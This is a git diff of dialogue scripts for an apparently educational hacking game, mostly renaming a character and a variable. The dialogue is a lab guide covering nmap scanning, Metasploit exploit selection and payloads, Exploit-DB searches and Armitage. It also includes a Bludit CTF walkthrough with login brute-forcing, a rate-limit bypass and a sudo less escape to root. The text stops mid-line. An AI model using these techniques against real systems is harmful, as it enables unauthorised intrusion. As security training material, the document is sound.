haxolottle_rapport += 5 Exploitation Specialist: For this lab, you'll scan your network to find two vulnerable servers - one Linux and one Windows. @@ -114,7 +114,7 @@ Exploitation Specialist: Where X.X are the second and third octets of your Kali Exploitation Specialist: Those specific version numbers are critical for finding applicable exploits. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [What if the scan takes too long?] Exploitation Specialist: Windows scans can take several minutes to complete - this is normal. @@ -123,7 +123,7 @@ Exploitation Specialist: Where X.X are the second and third octets of your Kali Exploitation Specialist: However, for thorough penetration testing, patience is important. You don't want to miss a vulnerable service on an unusual port. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [What if nmap shows ftp with a question mark?] Exploitation Specialist: If you see "ftp?" in the results, it means Nmap isn't confident about the service identification. @@ -132,14 +132,14 @@ Exploitation Specialist: Where X.X are the second and third octets of your Kali Exploitation Specialist: Try restarting the Windows server and scanning again. The service should respond properly after a fresh start. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> exploitation_hub === metasploit_database === Exploitation Specialist: Metasploit includes a PostgreSQL database that stores information about hosts, services, and vulnerabilities. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 Exploitation Specialist: This database integration is extremely powerful - it lets you import scan results and automatically target vulnerable services. @@ -154,7 +154,7 @@ Exploitation Specialist: Before using the database, you need to initialize it an Exploitation Specialist: You only need to do this once per session, or after restarting your Kali VM. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [How do I import Nmap scan results?] Exploitation Specialist: If you've saved Nmap results in XML format, you can import them: @@ -165,7 +165,7 @@ Exploitation Specialist: Before using the database, you need to initialize it an Exploitation Specialist: You can then query this data with commands like "hosts" and "services" - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [What can I do with the database?] Exploitation Specialist: Once data is in the database, you can query it intelligently: @@ -180,14 +180,14 @@ Exploitation Specialist: Before using the database, you need to initialize it an Exploitation Specialist: This integration makes targeting much more efficient. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> exploitation_hub === msfconsole_scanning === Exploitation Specialist: You can run scans directly from within msfconsole - you don't always need a separate terminal. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 Exploitation Specialist: Msfconsole can run Bash commands, so you can run Nmap directly: msf > nmap -O -sV TARGET @@ -202,7 +202,7 @@ Exploitation Specialist: Even better, you can use db_nmap which scans AND automa Exploitation Specialist: This scans all ports with OS and version detection, and the results are immediately available via "hosts" and "services" - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [Does Metasploit have its own scanners?] Exploitation Specialist: Yes! Metasploit has various port scanning modules, though they're not as feature-complete as Nmap. @@ -213,7 +213,7 @@ Exploitation Specialist: Even better, you can use db_nmap which scans AND automa Exploitation Specialist: These modules integrate directly with the database and can use multiple threads for faster scanning. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [How do I use Metasploit's port scanner?] Exploitation Specialist: First, select the module: use auxiliary/scanner/portscan/tcp @@ -226,14 +226,14 @@ Exploitation Specialist: Even better, you can use db_nmap which scans AND automa Exploitation Specialist: Results are automatically stored in the database. You can verify with the "services" command. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> exploitation_hub === searching_exploits === Exploitation Specialist: Metasploit's search command is incredibly powerful for finding relevant exploits. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 Exploitation Specialist: You can search by platform, service name, CVE number, exploit type, and more. @@ -256,7 +256,7 @@ Exploitation Specialist: But you can be much more specific with search operators Exploitation Specialist: Or: search type:exploit cve:2003-0352 - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [How do I search for specific software?] Exploitation Specialist: Simply include the software name in the search: @@ -271,7 +271,7 @@ Exploitation Specialist: But you can be much more specific with search operators Exploitation Specialist: Look through the results for modules that match your target's version number. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [Give me some search examples] Exploitation Specialist: Sure! Here are useful searches: @@ -288,14 +288,14 @@ Exploitation Specialist: But you can be much more specific with search operators Exploitation Specialist: Once you find a promising module, use "info exploit/path/to/module" to learn more about it. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> exploitation_hub === launching_exploits === Exploitation Specialist: Once you've identified the right exploit module, launching it follows a standard workflow. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 Exploitation Specialist: The process is: select the module, configure options, choose a payload, and launch the attack. @@ -320,7 +320,7 @@ Exploitation Specialist: Let's walk through a typical exploitation scenario. Exploitation Specialist: If successful, you'll get a shell on the target! - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [What payloads should I use?] Exploitation Specialist: The payload depends on what you want to achieve and what the exploit supports. @@ -339,7 +339,7 @@ Exploitation Specialist: Let's walk through a typical exploitation scenario. Exploitation Specialist: linux/x86/meterpreter/reverse_tcp - Meterpreter for Linux - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [What if the exploit doesn't work?] Exploitation Specialist: First, run "show options" and verify all settings, especially IP addresses. @@ -352,7 +352,7 @@ Exploitation Specialist: Let's walk through a typical exploitation scenario. Exploitation Specialist: Some exploits are unreliable and may need multiple attempts. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [What can I do once I have a shell?] Exploitation Specialist: With a Windows shell, you can run commands like: @@ -373,14 +373,14 @@ Exploitation Specialist: Let's walk through a typical exploitation scenario. Exploitation Specialist: We'll cover post-exploitation in more depth in later labs. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> exploitation_hub === armitage_intro === Exploitation Specialist: Armitage is a free and open source graphical interface for Metasploit with powerful automation features. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 Exploitation Specialist: It was created to make Metasploit more accessible and to automate repetitive tasks in penetration testing. @@ -397,7 +397,7 @@ Exploitation Specialist: Armitage can scan networks, automatically suggest attac Exploitation Specialist: However, experienced penetration testers often prefer msfconsole for its power and speed. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [How do I start Armitage?] Exploitation Specialist: First, initialize the Metasploit database if you haven't already: @@ -414,7 +414,7 @@ Exploitation Specialist: Armitage can scan networks, automatically suggest attac Exploitation Specialist: If prompted, allow Armitage to start the Metasploit RPC server. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [What does the Armitage interface show?] Exploitation Specialist: Armitage displays a visual network map showing discovered hosts. @@ -427,14 +427,14 @@ Exploitation Specialist: Armitage can scan networks, automatically suggest attac Exploitation Specialist: The interface makes it easy to see the big picture of a network and what you've compromised. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> exploitation_hub === armitage_usage === Exploitation Specialist: Let me walk you through using Armitage to scan and exploit targets. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 Exploitation Specialist: Armitage integrates scanning, vulnerability analysis, and exploitation into a streamlined workflow. @@ -449,7 +449,7 @@ Exploitation Specialist: Armitage integrates scanning, vulnerability analysis, a Exploitation Specialist: Any previously scanned hosts in the database will also appear automatically. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [How does Armitage suggest attacks?] Exploitation Specialist: Armitage analyzes the operating system and services detected on each host. @@ -462,7 +462,7 @@ Exploitation Specialist: Armitage integrates scanning, vulnerability analysis, a Exploitation Specialist: Right-click a host and select "Attack" to see suggested exploits categorized by service. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [How do I launch an attack in Armitage?] Exploitation Specialist: Right-click the target host and select "Attack" @@ -475,7 +475,7 @@ Exploitation Specialist: Armitage integrates scanning, vulnerability analysis, a Exploitation Specialist: You can then right-click the compromised host to interact with shells or run post-exploitation modules. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [How do I interact with a compromised system?] Exploitation Specialist: Right-click the compromised (red) host. @@ -488,14 +488,14 @@ Exploitation Specialist: Armitage integrates scanning, vulnerability analysis, a Exploitation Specialist: Armitage also has menu options for common post-exploitation tasks. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> exploitation_hub === vulnerability_databases === Exploitation Specialist: Beyond Metasploit, there are numerous online vulnerability databases you should know about. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 Exploitation Specialist: These databases provide detailed information about known vulnerabilities, even if exploits aren't publicly available. @@ -512,7 +512,7 @@ Exploitation Specialist: Different databases have different focuses and informat Exploitation Specialist: Packet Storm Security (packetstormsecurity.com) - Security tools, exploits, and advisories. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [What information do these databases provide?] Exploitation Specialist: Vulnerability databases typically include: @@ -529,7 +529,7 @@ Exploitation Specialist: Different databases have different focuses and informat Exploitation Specialist: Information about whether exploits exist in the wild. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [Do all vulnerabilities have CVEs?] Exploitation Specialist: No! This is an important point. @@ -544,14 +544,14 @@ Exploitation Specialist: Different databases have different focuses and informat Exploitation Specialist: This is why checking multiple sources and forums is important. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> exploitation_hub === exploit_db === Exploitation Specialist: The Exploit Database (Exploit-DB) is an extensive database focused on vulnerabilities with working exploits. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 Exploitation Specialist: It's maintained by Offensive Security (the makers of Kali Linux) and contains thousands of exploits with source code. @@ -566,7 +566,7 @@ Exploitation Specialist: Kali Linux includes a local copy of the entire database Exploitation Specialist: The database also categorizes exploits by type: remote, local, web application, DoS, etc. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [How do I use the local Exploit-DB copy?] Exploitation Specialist: On Kali Linux, exploits are stored in /usr/share/exploitdb/ @@ -577,7 +577,7 @@ Exploitation Specialist: Kali Linux includes a local copy of the entire database Exploitation Specialist: There's also an index file with descriptions: less /usr/share/exploitdb/files_exploits.csv - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [What's searchsploit?] Exploitation Specialist: Searchsploit is a command-line tool for searching the local Exploit-DB copy. @@ -590,7 +590,7 @@ Exploitation Specialist: Kali Linux includes a local copy of the entire database Exploitation Specialist: To download an exploit to your current directory: searchsploit -m windows/remote/11539.py - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [How do I use standalone exploits from Exploit-DB?] Exploitation Specialist: Standalone exploits often require some manual setup: @@ -605,14 +605,14 @@ Exploitation Specialist: Kali Linux includes a local copy of the entire database Exploitation Specialist: Always understand what an exploit does before running it! - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> exploitation_hub === commands_reference === Exploitation Specialist: Let me provide a comprehensive commands reference for this lab. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 Exploitation Specialist: **Initial Scanning:** @@ -647,7 +647,7 @@ Exploitation Specialist: msfconsole (start Metasploit console) Exploitation Specialist: msf > services -p 21 -R (and set RHOSTS) - ~ instructor_rapport += 3 + ~ haxolottle_rapport += 3 + [Show me Metasploit scanning modules] Exploitation Specialist: **Metasploit Port Scanners:** @@ -666,7 +666,7 @@ Exploitation Specialist: msfconsole (start Metasploit console) Exploitation Specialist: msf auxiliary(tcp) > back - ~ instructor_rapport += 3 + ~ haxolottle_rapport += 3 + [Show me searching for exploits] Exploitation Specialist: **Searching for Exploits:** @@ -685,7 +685,7 @@ Exploitation Specialist: msfconsole (start Metasploit console) Exploitation Specialist: msf > info exploit/windows/ftp/easyftp_cwd_fixret - ~ instructor_rapport += 3 + ~ haxolottle_rapport += 3 + [Show me launching exploits] Exploitation Specialist: **Launching Exploits:** @@ -706,7 +706,7 @@ Exploitation Specialist: msfconsole (start Metasploit console) Exploitation Specialist: msf exploit(...) > exploit - ~ instructor_rapport += 3 + ~ haxolottle_rapport += 3 + [Show me post-exploitation commands] Exploitation Specialist: **Post-Exploitation Commands (Windows):** @@ -729,7 +729,7 @@ Exploitation Specialist: msfconsole (start Metasploit console) Exploitation Specialist: cat flag (read flag file) - ~ instructor_rapport += 3 + ~ haxolottle_rapport += 3 + [Show me Armitage commands] Exploitation Specialist: **Armitage Setup:** @@ -752,7 +752,7 @@ Exploitation Specialist: msfconsole (start Metasploit console) Exploitation Specialist: 5. Right-click compromised host → Interact → Command shell - ~ instructor_rapport += 3 + ~ haxolottle_rapport += 3 + [Show me Exploit-DB commands] Exploitation Specialist: **Exploit Database:** @@ -767,14 +767,14 @@ Exploitation Specialist: msfconsole (start Metasploit console) Exploitation Specialist: searchsploit -m windows/remote/11539.py - ~ instructor_rapport += 3 + ~ haxolottle_rapport += 3 - -> exploitation_hub === challenge_tips === Exploitation Specialist: Let me give you practical tips for succeeding in the exploitation challenges. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 Exploitation Specialist: **Finding Vulnerable Services:** @@ -797,7 +797,7 @@ Exploitation Specialist: Import results into Metasploit for easier targeting: db Exploitation Specialist: If the exploit fails, restart the Windows VM and try again. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [Tips for exploiting the Linux server?] Exploitation Specialist: The Linux server has multiple potentially vulnerable services. @@ -812,7 +812,7 @@ Exploitation Specialist: Import results into Metasploit for easier targeting: db Exploitation Specialist: Some Linux exploits are more reliable than others - you may need to try a few. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [Tips for using Armitage?] Exploitation Specialist: Armitage is great for beginners because it suggests attacks automatically. @@ -825,7 +825,7 @@ Exploitation Specialist: Import results into Metasploit for easier targeting: db Exploitation Specialist: If Armitage seems to hang, check the console tab at the bottom for error messages. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [General troubleshooting advice?] Exploitation Specialist: Always verify your IP addresses with "show options" before running exploits. @@ -838,7 +838,7 @@ Exploitation Specialist: Import results into Metasploit for easier targeting: db Exploitation Specialist: Be patient - some exploits take time to establish connections. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [Where are the flags?] Exploitation Specialist: For the Windows server, look on a user's Desktop. @@ -857,14 +857,14 @@ Exploitation Specialist: Import results into Metasploit for easier targeting: db Exploitation Specialist: Read flags with: cat flag - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> exploitation_hub === ready_for_practice === Exploitation Specialist: Excellent! You're ready to start practical exploitation. -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 ~ exploitation_mastery += 10 Exploitation Specialist: You now understand how to move from scanning to exploitation - the core of penetration testing. @@ -886,7 +886,7 @@ Exploitation Specialist: In this lab, you'll scan two servers, identify vulnerab Exploitation Specialist: Good luck, Agent {player_name}. Time to put your skills to the test. - ~ instructor_rapport += 10 + ~ haxolottle_rapport += 10 - -> exploitation_hub diff --git a/story_design/ink/game_scenarios/feeling_blu_ctf.ink b/story_design/ink/game_scenarios/feeling_blu_ctf.ink index 64cb9bd..bce20f1 100644 --- a/story_design/ink/game_scenarios/feeling_blu_ctf.ink +++ b/story_design/ink/game_scenarios/feeling_blu_ctf.ink @@ -12,61 +12,61 @@ VAR challenge_mode = "guided" // "guided" or "ctf" EXTERNAL player_name === start === -CTF Challenge Coordinator: Welcome, Agent {player_name}. I'm your coordinator for the "Feeling Blu" CTF Challenge. +Haxolottle: Welcome, Agent {player_name}. I'm your coordinator for the "Feeling Blu" CTF Challenge. ~ instructor_rapport = 0 ~ ctf_mastery = 0 -CTF Challenge Coordinator: This is your final test - a comprehensive Capture The Flag challenge that brings together everything you've learned. +Haxolottle: This is your final test - a comprehensive Capture The Flag challenge that brings together everything you've learned. -CTF Challenge Coordinator: You'll exploit a web server, gain access, escalate privileges, and hunt for flags. This simulates a real-world penetration test from start to finish. +Haxolottle: You'll exploit a web server, gain access, escalate privileges, and hunt for flags. This simulates a real-world penetration test from start to finish. -CTF Challenge Coordinator: Before we begin, you need to choose how you want to approach this challenge. +Haxolottle: Before we begin, you need to choose how you want to approach this challenge. -> choose_path === choose_path === -CTF Challenge Coordinator: How do you want to tackle this CTF challenge? +Haxolottle: How do you want to tackle this CTF challenge? + [Pure CTF mode - minimal guidance, maximum challenge] ~ challenge_mode = "ctf" - CTF Challenge Coordinator: Excellent choice! You'll get the full Capture The Flag experience. + Haxolottle: Excellent choice! You'll get the full Capture The Flag experience. - CTF Challenge Coordinator: I'll give you the tools and objectives, but you'll need to figure out the approach yourself. + Haxolottle: I'll give you the tools and objectives, but you'll need to figure out the approach yourself. - CTF Challenge Coordinator: Use everything you've learned: scanning, exploitation, privilege escalation, and persistence. + Haxolottle: Use everything you've learned: scanning, exploitation, privilege escalation, and persistence. - CTF Challenge Coordinator: Only come back for hints if you're truly stuck. Good luck! + Haxolottle: Only come back for hints if you're truly stuck. Good luck! ~ ctf_mastery += 20 -> ctf_mode_hub + [Guided mode - walk me through the techniques] ~ challenge_mode = "guided" - CTF Challenge Coordinator: A wise choice for learning! I'll guide you through each phase with explanations. + Haxolottle: A wise choice for learning! I'll guide you through each phase with explanations. - CTF Challenge Coordinator: You'll learn web application exploitation, brute forcing, post-exploitation, and privilege escalation with structured guidance. + Haxolottle: You'll learn web application exploitation, brute forcing, post-exploitation, and privilege escalation with structured guidance. - CTF Challenge Coordinator: This approach ensures you understand not just how to exploit, but why each technique works. + Haxolottle: This approach ensures you understand not just how to exploit, but why each technique works. ~ instructor_rapport += 10 -> guided_mode_hub === ctf_mode_hub === -CTF Challenge Coordinator: This is CTF mode - you're on your own! Here's what I can tell you: +Haxolottle: This is CTF mode - you're on your own! Here's what I can tell you: -CTF Challenge Coordinator: Target: A web server running on your victim VM. +Haxolottle: Target: A web server running on your victim VM. -CTF Challenge Coordinator: Objectives: Find multiple flags, gain shell access, escalate to root. +Haxolottle: Objectives: Find multiple flags, gain shell access, escalate to root. -CTF Challenge Coordinator: Tools available: Nmap, Dirb, Nikto, Metasploit, OWASP ZAP, and more. +Haxolottle: Tools available: Nmap, Dirb, Nikto, Metasploit, OWASP ZAP, and more. + [What tools should I start with?] - CTF Challenge Coordinator: Think about the attack methodology: reconnaissance, scanning, exploitation, post-exploitation, privilege escalation. + Haxolottle: Think about the attack methodology: reconnaissance, scanning, exploitation, post-exploitation, privilege escalation. - CTF Challenge Coordinator: Start by discovering what's running: Nmap for services, Dirb and Nikto for web enumeration. + Haxolottle: Start by discovering what's running: Nmap for services, Dirb and Nikto for web enumeration. - CTF Challenge Coordinator: Look for hidden files, admin panels, and leaked credentials. + Haxolottle: Look for hidden files, admin panels, and leaked credentials. ~ instructor_rapport += 5 @@ -93,63 +93,63 @@ CTF Challenge Coordinator: Tools available: Nmap, Dirb, Nikto, Metasploit, OWASP -> END === ctf_recon_hints === -CTF Challenge Coordinator: Alright, here's a hint for reconnaissance: +Haxolottle: Alright, here's a hint for reconnaissance: -CTF Challenge Coordinator: Start with Nmap to identify services and versions: nmap -sV TARGET_IP +Haxolottle: Start with Nmap to identify services and versions: nmap -sV TARGET_IP -CTF Challenge Coordinator: Use Dirb to find hidden directories: dirb http://TARGET_IP +Haxolottle: Use Dirb to find hidden directories: dirb http://TARGET_IP -CTF Challenge Coordinator: Use Nikto for web vulnerabilities: nikto -h http://TARGET_IP +Haxolottle: Use Nikto for web vulnerabilities: nikto -h http://TARGET_IP -CTF Challenge Coordinator: Look carefully at discovered files - some contain very useful information about usernames and passwords! +Haxolottle: Look carefully at discovered files - some contain very useful information about usernames and passwords! -CTF Challenge Coordinator: The CMS being used might have known exploits. Identify what CMS is running. +Haxolottle: The CMS being used might have known exploits. Identify what CMS is running. ~ instructor_rapport += 5 -> ctf_mode_hub === ctf_exploit_hints === -CTF Challenge Coordinator: Here's a hint for exploitation: +Haxolottle: Here's a hint for exploitation: -CTF Challenge Coordinator: You should have discovered Bludit CMS running on the server. +Haxolottle: You should have discovered Bludit CMS running on the server. -CTF Challenge Coordinator: Search Metasploit for Bludit exploits: search bludit +Haxolottle: Search Metasploit for Bludit exploits: search bludit -CTF Challenge Coordinator: You'll need both a username and password - these might have been leaked in hidden files. +Haxolottle: You'll need both a username and password - these might have been leaked in hidden files. -CTF Challenge Coordinator: If you only have the username, consider brute-forcing the password using OWASP ZAP. +Haxolottle: If you only have the username, consider brute-forcing the password using OWASP ZAP. -CTF Challenge Coordinator: The Bludit vulnerability allows arbitrary code execution and should give you a Meterpreter shell. +Haxolottle: The Bludit vulnerability allows arbitrary code execution and should give you a Meterpreter shell. ~ instructor_rapport += 5 -> ctf_mode_hub === ctf_privesc_hints === -CTF Challenge Coordinator: Here's a hint for privilege escalation: +Haxolottle: Here's a hint for privilege escalation: -CTF Challenge Coordinator: After gaining initial access, check what sudo commands your user can run: sudo -l +Haxolottle: After gaining initial access, check what sudo commands your user can run: sudo -l -CTF Challenge Coordinator: If your user can run certain commands with sudo, look for ways to escape from those commands to get a root shell. +Haxolottle: If your user can run certain commands with sudo, look for ways to escape from those commands to get a root shell. -CTF Challenge Coordinator: The 'less' command is particularly interesting - it can execute shell commands with ! +Haxolottle: The 'less' command is particularly interesting - it can execute shell commands with ! -CTF Challenge Coordinator: If you can run 'less' with sudo, you can escape to a root shell! +Haxolottle: If you can run 'less' with sudo, you can escape to a root shell! ~ instructor_rapport += 5 -> ctf_mode_hub === switch_to_guided === -CTF Challenge Coordinator: Switching to guided mode. I'll walk you through the complete solution. +Haxolottle: Switching to guided mode. I'll walk you through the complete solution. ~ challenge_mode = "guided" -> guided_mode_hub === guided_mode_hub === -CTF Challenge Coordinator: Welcome to guided mode. I'll walk you through each phase of the challenge. +Haxolottle: Welcome to guided mode. I'll walk you through each phase of the challenge. + [Part 1: Information gathering and reconnaissance] -> phase_1_recon @@ -181,417 +181,417 @@ CTF Challenge Coordinator: Welcome to guided mode. I'll walk you through each ph -> END === web_tools_intro === -CTF Challenge Coordinator: Let me introduce the key web security tools you'll need. +Haxolottle: Let me introduce the key web security tools you'll need. ~ instructor_rapport += 5 -CTF Challenge Coordinator: **Dirb** is a web content scanner that finds hidden files and directories using dictionary attacks. +Haxolottle: **Dirb** is a web content scanner that finds hidden files and directories using dictionary attacks. -CTF Challenge Coordinator: **Nikto** is a web vulnerability scanner that checks for dangerous files, outdated software, and misconfigurations. +Haxolottle: **Nikto** is a web vulnerability scanner that checks for dangerous files, outdated software, and misconfigurations. -CTF Challenge Coordinator: **OWASP ZAP** is an intercepting proxy that lets you capture, modify, and replay HTTP requests - perfect for brute forcing. +Haxolottle: **OWASP ZAP** is an intercepting proxy that lets you capture, modify, and replay HTTP requests - perfect for brute forcing. + [How do I use Dirb?] - CTF Challenge Coordinator: Dirb is straightforward: dirb http://TARGET_IP + Haxolottle: Dirb is straightforward: dirb http://TARGET_IP - CTF Challenge Coordinator: It uses a built-in dictionary to test common paths like /admin/, /backup/, /config/, etc. + Haxolottle: It uses a built-in dictionary to test common paths like /admin/, /backup/, /config/, etc. - CTF Challenge Coordinator: Pay attention to discovered files - they often contain credentials or sensitive configuration data. + Haxolottle: Pay attention to discovered files - they often contain credentials or sensitive configuration data. - CTF Challenge Coordinator: Right-click discovered URLs to open them in your browser and examine their contents. + Haxolottle: Right-click discovered URLs to open them in your browser and examine their contents. ~ instructor_rapport += 5 + [How do I use Nikto?] - CTF Challenge Coordinator: Nikto scans for web vulnerabilities: nikto -h http://TARGET_IP + Haxolottle: Nikto scans for web vulnerabilities: nikto -h http://TARGET_IP - CTF Challenge Coordinator: It checks for over 6,000 security issues including dangerous files, server misconfigurations, and known vulnerabilities. + Haxolottle: It checks for over 6,000 security issues including dangerous files, server misconfigurations, and known vulnerabilities. - CTF Challenge Coordinator: The output shows each finding with references for more information. + Haxolottle: The output shows each finding with references for more information. - CTF Challenge Coordinator: Nikto results help you understand what attacks might be successful. + Haxolottle: Nikto results help you understand what attacks might be successful. ~ instructor_rapport += 5 + [How do I use OWASP ZAP?] - CTF Challenge Coordinator: OWASP ZAP acts as a proxy between your browser and the web server. + Haxolottle: OWASP ZAP acts as a proxy between your browser and the web server. - CTF Challenge Coordinator: It intercepts HTTP requests and responses, allowing you to modify and replay them. + Haxolottle: It intercepts HTTP requests and responses, allowing you to modify and replay them. - CTF Challenge Coordinator: This is incredibly useful for brute forcing login forms, especially those with CSRF protection. + Haxolottle: This is incredibly useful for brute forcing login forms, especially those with CSRF protection. - CTF Challenge Coordinator: You can also use it to bypass IP-based rate limiting with the X-Forwarded-For header. + Haxolottle: You can also use it to bypass IP-based rate limiting with the X-Forwarded-For header. ~ instructor_rapport += 5 - -> {challenge_mode == "ctf": ctf_mode_hub | guided_mode_hub} === phase_1_recon === -CTF Challenge Coordinator: Phase 1 is all about information gathering - discovering what you're dealing with before launching attacks. +Haxolottle: Phase 1 is all about information gathering - discovering what you're dealing with before launching attacks. ~ instructor_rapport += 5 -CTF Challenge Coordinator: The attack methodology follows this sequence: reconnaissance, scanning, exploitation, post-exploitation, and privilege escalation. +Haxolottle: The attack methodology follows this sequence: reconnaissance, scanning, exploitation, post-exploitation, and privilege escalation. -CTF Challenge Coordinator: Each phase builds on the previous, so thorough reconnaissance is crucial. +Haxolottle: Each phase builds on the previous, so thorough reconnaissance is crucial. + [What should I scan for?] - CTF Challenge Coordinator: Start with network reconnaissance: nmap -sV TARGET_IP + Haxolottle: Start with network reconnaissance: nmap -sV TARGET_IP - CTF Challenge Coordinator: This identifies open ports, running services, and software versions. + Haxolottle: This identifies open ports, running services, and software versions. - CTF Challenge Coordinator: Then scan the web application: dirb http://TARGET_IP + Haxolottle: Then scan the web application: dirb http://TARGET_IP - CTF Challenge Coordinator: Follow up with: nikto -h http://TARGET_IP + Haxolottle: Follow up with: nikto -h http://TARGET_IP - CTF Challenge Coordinator: Look for admin panels, configuration files, backup files, and anything that might contain credentials. + Haxolottle: Look for admin panels, configuration files, backup files, and anything that might contain credentials. ~ instructor_rapport += 5 + [What am I looking for specifically?] - CTF Challenge Coordinator: You're looking for several things: + Haxolottle: You're looking for several things: - CTF Challenge Coordinator: What CMS (Content Management System) is running? This tells you what exploits might work. + Haxolottle: What CMS (Content Management System) is running? This tells you what exploits might work. - CTF Challenge Coordinator: Are there leaked credentials in discovered files? Check text files, logs, and backups. + Haxolottle: Are there leaked credentials in discovered files? Check text files, logs, and backups. - CTF Challenge Coordinator: Is there an admin login page? You might need to access it. + Haxolottle: Is there an admin login page? You might need to access it. - CTF Challenge Coordinator: What server software and versions are running? This helps identify known vulnerabilities. + Haxolottle: What server software and versions are running? This helps identify known vulnerabilities. - CTF Challenge Coordinator: There's also a flag hidden in one of the discovered files! + Haxolottle: There's also a flag hidden in one of the discovered files! ~ instructor_rapport += 5 + [Walk me through the reconnaissance process] - CTF Challenge Coordinator: Here's the step-by-step process: + Haxolottle: Here's the step-by-step process: - CTF Challenge Coordinator: 1. Run Nmap: nmap -sV -p- TARGET_IP (scan all ports with version detection) + Haxolottle: 1. Run Nmap: nmap -sV -p- TARGET_IP (scan all ports with version detection) - CTF Challenge Coordinator: 2. Run Dirb: dirb http://TARGET_IP (find hidden directories and files) + Haxolottle: 2. Run Dirb: dirb http://TARGET_IP (find hidden directories and files) - CTF Challenge Coordinator: 3. Run Nikto: nikto -h http://TARGET_IP (identify web vulnerabilities) + Haxolottle: 3. Run Nikto: nikto -h http://TARGET_IP (identify web vulnerabilities) - CTF Challenge Coordinator: 4. Browse discovered URLs - open them in Firefox to see what they contain + Haxolottle: 4. Browse discovered URLs - open them in Firefox to see what they contain - CTF Challenge Coordinator: 5. Look for patterns: usernames on the website, admin pages, leaked files + Haxolottle: 5. Look for patterns: usernames on the website, admin pages, leaked files - CTF Challenge Coordinator: 6. Document everything - the CMS name, discovered usernames, any found credentials + Haxolottle: 6. Document everything - the CMS name, discovered usernames, any found credentials - CTF Challenge Coordinator: The reconnaissance might reveal Bludit CMS with an admin login at /admin/ + Haxolottle: The reconnaissance might reveal Bludit CMS with an admin login at /admin/ ~ instructor_rapport += 5 - -> guided_mode_hub === phase_2_exploitation === -CTF Challenge Coordinator: Phase 2 is exploitation - using discovered vulnerabilities to gain access. +Haxolottle: Phase 2 is exploitation - using discovered vulnerabilities to gain access. ~ instructor_rapport += 5 -CTF Challenge Coordinator: Based on your reconnaissance, you should have identified Bludit CMS running on the server. +Haxolottle: Based on your reconnaissance, you should have identified Bludit CMS running on the server. -CTF Challenge Coordinator: Bludit has known vulnerabilities that we can exploit using Metasploit. +Haxolottle: Bludit has known vulnerabilities that we can exploit using Metasploit. + [How do I find Bludit exploits?] - CTF Challenge Coordinator: In Metasploit, search for Bludit: search bludit + Haxolottle: In Metasploit, search for Bludit: search bludit - CTF Challenge Coordinator: You'll find several modules. Look for ones related to code execution or file upload. + Haxolottle: You'll find several modules. Look for ones related to code execution or file upload. - CTF Challenge Coordinator: Use info to read about each exploit: info exploit/linux/http/bludit_upload_images_exec + Haxolottle: Use info to read about each exploit: info exploit/linux/http/bludit_upload_images_exec - CTF Challenge Coordinator: This particular exploit allows arbitrary code execution through image upload functionality. + Haxolottle: This particular exploit allows arbitrary code execution through image upload functionality. ~ instructor_rapport += 5 + [What do I need to exploit Bludit?] - CTF Challenge Coordinator: The Bludit exploit requires several pieces of information: + Haxolottle: The Bludit exploit requires several pieces of information: - CTF Challenge Coordinator: RHOSTS: The target IP address + Haxolottle: RHOSTS: The target IP address - CTF Challenge Coordinator: BLUDITUSER: The Bludit admin username (should have been discovered during recon) + Haxolottle: BLUDITUSER: The Bludit admin username (should have been discovered during recon) - CTF Challenge Coordinator: BLUDITPASS: The admin password (might have been leaked, or you'll need to brute force it) + Haxolottle: BLUDITPASS: The admin password (might have been leaked, or you'll need to brute force it) - CTF Challenge Coordinator: TARGETURI: Typically / (the root of the web server) + Haxolottle: TARGETURI: Typically / (the root of the web server) - CTF Challenge Coordinator: The exploit will give you a Meterpreter shell if successful! + Haxolottle: The exploit will give you a Meterpreter shell if successful! ~ instructor_rapport += 5 + [What if I don't have the password?] - CTF Challenge Coordinator: If you found the username but not the password, you have options: + Haxolottle: If you found the username but not the password, you have options: - CTF Challenge 